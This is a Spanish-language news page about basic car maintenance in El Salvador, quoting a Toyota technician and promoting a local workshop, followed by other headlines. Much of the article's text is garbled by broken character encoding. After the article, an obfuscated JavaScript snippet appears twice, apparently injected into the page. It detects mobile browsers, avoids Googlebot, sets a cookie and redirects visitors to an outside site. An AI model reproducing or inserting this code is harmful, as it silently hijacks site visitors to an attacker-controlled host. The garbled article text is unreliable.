Noticias

17 Ene 2013
Noticias | Por: Redacción

No desgastes la vida de tu auto

La reparaciA?n de un automA?vil puede generar altos costos, mA?s aA?n si se comprometen partes fundamentales como el motor, caja de cambios, direcciA?n, entre otros; no obstante dichos costos pueden reducirse drA?sticamente si antes aplica un mantenimiento bA?sico a su automotor.

Ai??

De acuerdo con Omar Rivera, quien se desempeAi??a en Excel Automotriz como Jefe TAi??cnico de Toyota en El Salvador y con 27 aAi??os de experiencia, ai???la mecA?nica bA?sica puede representar una verdadera soluciA?n a largo plazoai???. Destaca que dentro del mantenimiento automotriz se verifica el tipo, calidad y cantidad de aceite en motor, caja de velocidades y diferencial, tambiAi??n su respectivo filtro de aceite, chequeo de todos los fluidos, el sistema de frenos que incluye pastillas y zapatas, el sistema de enfriamiento, el fluido del sistema hidrA?ulico, se verifica la condiciA?n de las fajas del motor, rendimiento de accesorios como luces y finalmente verificar la presiA?n de los neumA?ticos.Ai?? Ai??Ai??Ai??Ai??Ai??

Ai??

Por otro lado, si bien es cierto que el sistema de suspensiA?n no entra en el mantenimiento bA?sico, Rivera sugiere el cambio de amortiguadores cada 40 mil kilA?metros, tambiAi??n se sugiere el cambio cuando el vehAi??culo presenta un ai???rebote anormalai??? o ruidos, ai???las condiciones de las carreteras en el paAi??s aceleran el desgaste del sistema de suspensiA?n,ai??? indicA? Rivera.

Ai??

TambiAi??n el tema de las fajas se vuelve un tema recurrente y fA?cilmente puede ser prevenido, evitando inconvenientes como quedarse varado en carretera y por consiguiente el pago de una grA?a. Rivera indica que normalmente aAi?? unAi?? vehAi??culo se le debe cambiar la faja cada un mil kilA?metros, no obstante cada fabricante estipula el tiempo prudencial segA?n el modelo o el aAi??o. Agrega que en cuanto a los motores diAi??sel, los A?ltimos modelos de carros traen un piloto llamado ai???T ai??i?? BELTai??? el cual indica que la faja de su vehAi??culo ha cumplido con su vida A?til y se sugiere llegar lo antes posible a un taller autorizado lo mA?s pronto posible.Ai??

Ai??

En cuanto al mantenimiento de frenos se sugiere cambiar las pastillas alrededor de cada 10 mil kilA?metros. Los vehAi??culos mA?s recientes cuentan con un sensor indicador de desgaste, Rivera asegura que cuando estA?n prA?ximos a llegar a su nivel de desgaste, estipulado por la fA?brica el carro emite un sonido constante. Dicho sensor estA? incorporado a la pastilla de los frenos.

Ai??

En cuanto a las zapatas no hay un indicador como un sensor, no obstante se puede observar un desgaste a travAi??s del recorrido mayor que va teniendo el freno de mano, ai???al levantar el freno de mano tendrAi??a que detener el carro al tercer ai???clickai??i??, si este se pasa de 4, 5 o 6 ai???clickai??i??sai??i?? se debe buscar ayuda para revisar el estado de la zapataai???, indica Rivera.Ai?? Una zapata es el mecanismo que tiene el freno de mano para detener el movimiento del carro.

Ai??

En cuanto al sistema elAi??ctrico, uno de los indicadores que el sistema de carga estA? defectuoso es la opacidad en las luces, cambian de color blanco intenso a amarillento, ademA?s otro indicador es que para poderlo arrancar se necesitan al menos de tres intentos para su encendido. Ai??

Ai??

Problema que sucede por falta de atenciA?n

Aunque parezca increAi??ble, un problema que Rivera ha notado con mayor frecuencia es la equivocaciA?n que cometen algunas personas de introducir diAi??sel cuando su automA?vil es tipo gasolina, o viceversa. En esos casos se recomienda no echar andar el automA?vil, se debe trasladar el vehAi??culo a un centro de servicio autorizado para que se realice un lavado de tanque de combustible y de tuberAi??as y filtro.

Ai??

En El Salvador existe un taller, Excel Automotriz, que ofrece todos los servicios que un vehAi??culo pueda requerir en las marcas que distribuye, Toyota, Kia, Mitsubishi, Chevrolet y BMW, desde reparaciones en la carrocerAi??a, asientos, puertas, ajuste baA?l, cambio de empaque , sistema elAi??ctrico, carga, arranque, aire acondicionado, sistema de transmisiA?n, reacondicionamiento de transmisiones, suspensiA?n, direcciA?n, alineamiento, cambio de cremalleras, terminales, todo del rubro de mecA?nica.

Ai??

Cada tAi??cnico automotriz es capacitado por los fabricantes de automA?viles, a medida que el tAi??cnico va adquiriendo todas las capacitaciones de todos los fabricantes va incrementando su conocimiento, elevando asAi?? su habilidad y por consiguiente la mejor mano de obra capacitada en el paAi??s, en el rubro automotriz.Ai??

-Publicidad-.Ai??

Mantenimiento bA?sico

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

15 Ago 2018
Mercado Cuscatlán, proyecto insignia de Bukele bajo investigación por irregularidades
Noticias | Por: Redacción

Mercado Cuscatlán, proyecto insignia de Bukele bajo investigación por irregularidades

14 Ago 2018
Sin democracia, el factor que tienen en común Venezuela y Nicaragua
Noticias | Por: Redacción

Sin democracia, el factor que tienen en común Venezuela y Nicaragua

13 Ago 2018
¿Sabías que por robar una vaca te pueden dar 5 años de cárcel? Misma sentencia que Saca con sus $301 millones
Noticias | Por: Redacción

¿Sabías que por robar una vaca te pueden dar 5 años de cárcel? Misma sentencia que Saca con sus $301 millones

13 Ago 2018
Este fue el legado de Fernando Llort. Conocelo
Noticias | Por: Redacción

Este fue el legado de Fernando Llort. Conocelo